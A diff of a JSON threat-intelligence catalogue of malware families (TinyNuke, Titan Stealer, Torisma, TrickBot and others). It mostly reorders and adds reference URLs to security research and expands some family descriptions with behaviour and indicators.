+ "https://twitter.com/VK_Intel/status/1273292957429510150",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
 "https://github.com/SherifEldeeb/TinyMet",
 "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
- "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
- "https://twitter.com/VK_Intel/status/1273292957429510150",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
 "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/"
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672"
 ],
 "synonyms": [
 "TiniMet"
@@ -47329,16 +49559,16 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke",
 "https://asec.ahnlab.com/en/27346/",
- "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/",
- "https://asec.ahnlab.com/en/32781/",
- "https://krebsonsecurity.com/tag/nuclear-bot/",
+ "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html",
 "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/",
+ "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/",
 "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet",
- "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702",
- "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
+ "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/",
+ "https://krebsonsecurity.com/tag/nuclear-bot/",
 "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
- "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html"
+ "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
+ "https://asec.ahnlab.com/en/32781/",
+ "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702"
 ],
 "synonyms": [
 "MicroBankingTrojan",
@@ -47370,8 +49600,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot",
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf",
 "https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf",
 "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy"
 ],
 "synonyms": [],
@@ -47385,8 +49615,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla",
- "https://blog.talosintelligence.com/2021/09/tinyturla.html",
- "https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/"
+ "https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/",
+ "https://blog.talosintelligence.com/2021/09/tinyturla.html"
 ],
 "synonyms": [],
 "type": []
@@ -47407,12 +49637,14 @@
 "value": "Tiop"
 },
 {
- "description": "Information stealer written in Go.",
+ "description": "The stealer is written in Go and capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.titan_stealer",
- "https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign",
- "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html"
+ "https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219",
+ "https://github.com/D4NTESCODE/TitanStealerSource",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html",
+ "https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign"
 ],
 "synonyms": [],
 "type": []
@@ -47425,17 +49657,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
+ "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
 "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
- "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
 "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
 "https://vblocalhost.com/uploads/VB2020-20.pdf",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
 "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
 "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
- "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger"
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
 ],
 "synonyms": [
 "LuckyBack"
@@ -47450,25 +49682,26 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee",
- "https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/",
- "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
- "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet",
- "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/",
- "https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4",
 "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-2-inmemoryconfig-store-vaccine/",
- "https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/",
- "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "https://www.cert.pl/en/news/single/tofsee-en/",
- "https://blog.talosintelligence.com/tofsee-spam/",
- "https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897~.asp",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/",
 "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
 "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/",
+ "https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
 "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
- "https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining"
+ "https://www.cert.pl/en/news/single/tofsee-en/",
+ "https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/",
+ "https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897~.asp",
+ "https://blog.talosintelligence.com/tofsee-spam/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/"
 ],
 "synonyms": [
 "Gheg"
@@ -47507,13 +49740,13 @@
 "value": "tomiris"
 },
 {
- "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.",
+ "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files \u2013 temp.txt and temp2.txt \u2013 within the same directory of its execution.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf",
 "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
- "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
- "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/"
+ "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/",
+ "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
 ],
 "synonyms": [],
 "type": []
@@ -47526,7 +49759,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.toneshell",
- "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html"
+ "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
+ "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/"
 ],
 "synonyms": [],
 "type": []
@@ -47562,13 +49796,14 @@
 "value": "Topinambour"
 },
 {
- "description": "",
+ "description": "Torisma is a complex HTTP(S) downloader, that can serve as an orchestrator handling the execution of additional payloads from the C&C server.\r\n\r\nIt uses VEST-32 for encryption and decryption of network traffic between the client and the server. \r\n\r\nTypically, it uses these parameter names for its HTTP POST requests: ACTION, CODE, CACHE, REQUEST, RES. It sends the victim's MAC address in the initial request.\r\n\r\nThe response of the server informing the client about a successful authentication is \"Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}\". The client then requests additional data from the server, that decrypts to shellcode and its data parameters, and is executed. The client also creates a named pipe, \\\\.\\pipe\\fb4d1181bb09b484d058768598b, that allows inter-process communication with the executed shellcode. \r\n\r\nTorisma was usually downloaded by NedDnLoader, and deployed in the Operation DreamJob campaigns starting around Q4 2019.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma",
- "http://blog.nsfocus.net/stumbzarus-apt-lazarus/",
- "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
 "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
+ "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
+ "http://blog.nsfocus.net/stumbzarus-apt-lazarus/",
+ "https://www.telsy.com/lazarus-gate/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/"
 ],
 "synonyms": [],
@@ -47593,12 +49828,26 @@
 "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2",
 "value": "TorrentLocker"
 },
+ {
+ "description": "Downloader, delivered via a lure with fake exploits published on Github.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tor_loader",
+ "https://vulncheck.com/blog/fake-repos-deliver-malicious-implant"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b6c84477-198f-42ea-808b-e20b23271cd0",
+ "value": "TorLoader"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove",
- "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
+ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970",
+ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/"
 ],
 "synonyms": [],
 "type": []
@@ -47624,8 +49873,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye",
- "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/",
- "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/"
+ "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/",
+ "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/"
 ],
 "synonyms": [],
 "type": []
@@ -47651,11 +49900,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.gdatasoftware.com/blog/trat-control-via-smartphone",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.gdatasoftware.com/blog/trat-control-via-smartphone"
+ "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns"
 ],
 "synonyms": [],
 "type": []
@@ -47668,9 +49917,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter",
+ "http://adelmas.com/blog/treasurehunter.php",
 "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/",
- "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html",
- "http://adelmas.com/blog/treasurehunter.php"
+ "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html"
 ],
 "synonyms": [
 "huntpos"
@@ -47685,284 +49934,287 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/",
- "https://home.treasury.gov/news/press-releases/jy1256",
- "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
- "https://www.youtube.com/watch?v=KMcSAlS9zGE",
- "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
- "https://labs.vipre.com/trickbots-tricks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks",
- "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-076a",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
- "https://community.riskiq.com/article/04ec92f4",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
- "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/",
- "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://community.riskiq.com/article/111d6005/description",
- "https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
- "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/",
- "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure",
- "https://www.youtube.com/watch?v=EdchPEHnohw",
- "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/",
- "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/",
- "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/",
- "https://cofenselabs.com/all-you-need-is-text-second-wave/",
- "https://www.secdata.com/the-trickbot-and-mikrotik/",
- "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/",
- "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/",
- "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/",
- "https://www.wired.com/story/trickbot-malware-group-internal-messages/",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis",
- "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
- "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
- "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
- "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
- "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://osint.fans/service-nsw-russia-association",
- "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html",
- "https://securelist.com/trickbot-module-descriptions/104603/",
- "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
- "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
- "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
- "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
- "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.cert.pl/en/news/single/detricking-trickbot-loader/",
- "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users",
- "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/",
- "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "http://www.malware-traffic-analysis.net/2018/02/01/",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/",
- "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf",
- "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet",
- "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.ic3.gov/Media/News/2022/220120.pdf",
- "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows",
- "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html",
- "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/",
- "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/",
- "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://blog.talosintelligence.com/2020/03/trickbot-primer.html",
- "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
- "https://community.riskiq.com/article/298c9fc9",
- "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
- "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass",
- "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
- "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor",
- "https://www.mandiant.com/media/12596/download",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "https://www.joesecurity.org/blog/498839998833561473",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
- "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
- "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/",
- "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
